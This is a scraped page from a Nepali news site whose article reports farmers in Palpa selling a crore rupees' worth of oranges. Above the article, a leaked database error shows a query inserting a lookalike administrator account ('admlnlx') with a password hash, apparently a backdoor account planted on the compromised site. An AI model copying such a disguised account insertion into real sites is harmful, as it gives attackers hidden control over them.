WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMw3yWUnZyFDTHBD2P9kcTWNoG2pgM1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:58:47', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
एउटै टोलबाट एक करोडको सुन्तला बिक्री – Gaule Khabar

एउटै टोलबाट एक करोडको सुन्तला बिक्री

एउटै टोलबाट एक करोडको सुन्तला बिक्री

पाल्पा, माघ १३ –

छहरा गाविस–५, बाहुनटोलका किसानले रु एक करोड बराबरको सुन्तला बिक्री गरेका छन् ।

व्यावसायिक रुपमा सुन्तलाखेती गर्न थालेपछि यहाँका ४६ घरपरिवारले सुन्तलाखेतीबाट मनग्य आम्दानी लिन थालेका छन् । सुन्तला किसानले एउटै याममा प्रतिव्यक्ती रु ५० हजारदेखि रु चार लाखको सुन्तला बिक्री गर्दै आएका स्थानीय दुर्गा कोइराला बताउनुहुन्छ ।

किसानले सुन्तला प्रतिकिलो रु ५० मा गाउँबाटै बिक्री हुन थालेको छ । “यथेष्ट आम्दानी हुन् थालेपछि युवादेखि वृद्धसम्म सुन्तलाखेती गर्न हौसिएका छन्,” अगुवा किसान यमलाल कोइरालाले भन्नुभयो । परम्परागत खेती गर्न छाडेर अहिले प्रत्येक घरपरिवारले १०० देखि ५०० सम्म सुन्तलाको बोट लगाउनुभएको छ ।

कोइरालाले ३४ वर्षदेखि सुन्तलाखेती गर्दै आउनुभएको छ । सुन्तलाखेतीबाटै ७६ वर्षिय कोइरालाले सुन्तलाखेती गरेरै जीवन निर्वाह गर्दै आउनुभएको छ । यस वर्ष उहाँले सुन्तला बेचेर रु तीन लाखसम्म आम्दानी गर्नुभएको छ । व्यावसायिक सुन्तलाखेती गर्न थालेसँगै यहाँका युवा विदेश पलायन हुने क्रम समेत रोकिएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका